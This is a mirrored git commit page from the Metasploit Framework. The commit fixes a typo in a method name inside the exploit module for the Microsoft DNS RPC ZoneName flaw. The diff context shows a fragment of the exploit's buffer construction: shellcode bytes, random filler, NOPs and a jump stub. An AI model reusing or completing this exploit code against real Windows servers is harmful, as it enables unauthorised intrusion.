mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
Typo
git-svn-id: file:///home/svn/framework3/trunk@4680 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
3c9007a7be
commit
b5b4556ee7
@ -95,7 +95,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||
"\x81\xef" + [-0x0604].pack("V") +
|
||||
"\xff\xd7"
|
||||
|
||||
txt = Rex::Text.text_rand_alpha(480)
|
||||
txt = Rex::Text.rand_text_alpha(480)
|
||||
txt << make_nops(160)
|
||||
txt << jumper
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user